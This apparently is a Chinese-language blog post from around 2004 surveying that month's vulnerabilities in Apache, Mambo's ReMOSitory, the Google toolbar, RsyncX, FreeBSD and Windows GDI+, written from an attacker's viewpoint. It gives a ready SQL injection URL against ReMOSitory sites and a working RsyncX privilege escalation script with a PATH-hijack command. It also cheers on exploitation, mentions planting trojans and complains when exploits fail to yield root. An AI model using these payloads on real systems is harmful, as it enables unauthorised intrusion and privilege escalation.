9月安全漏洞

◆ Apache Web Server远程IPv6缓冲区溢出漏洞

截止，我发表这个章子之前，凹是没拿到利用程序，找了几个要IPV6模拟数据包构造的程序，没人搞这块，这几天收集一下，兰州大学o3那一组01年开始搞IPV6，并且有个实验网，问问他内部消息，GO ，GO ，GO
 
◆ Apache Mod_DAV LOCK远程拒绝服务漏洞

点进去就知道，咋利用了，也GO，GO，GO
 
◆ ReMOSitory Server远程SQL注入漏洞

http://[target]/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*   国内用的还是少，不过有Mambo Open Source的，用以上URL构造，就可以达成注入攻击

 
◆ Google工具栏'About'跨站脚本执行漏洞

跨站，是实在搞不定，再搞，有写WEB利用脚本那会工夫，木马都杀进去几个了，看看也好，举一反三
 
◆ RsyncX本地权限提升漏洞

建立如下内容的~/bin/defaults文件：

=============================
#!/bin/sh                                                                      
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

然后在用户路径的~/bin中运行RsyncX ：

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

 
◆ FreeBSD本地内核缓冲区溢出漏洞

这东西有用，搜索了http://www.securityfocus.com/   没找到攻击程序

◆ Microsoft Windows GDI+ JPG解析组件缓冲区溢出漏洞

yahoo.com，N写日子前就是被这块漏洞所破坏，构造木马程序写入JPG文件，怪他自己吧，发布了这么长时间，
YAHOO的安全顾问也没补，http://www.cert.org.cn/articles/vulnerability/common/2004091521909.shtml
这是国家安全应急中心发布的漏洞，描述和资料

◆ Apache mod_ssl反向代理SSL远程缓冲区溢出漏洞
最近的apache漏洞都很多，很多EXP都没有响应的效果，不能得到ROOT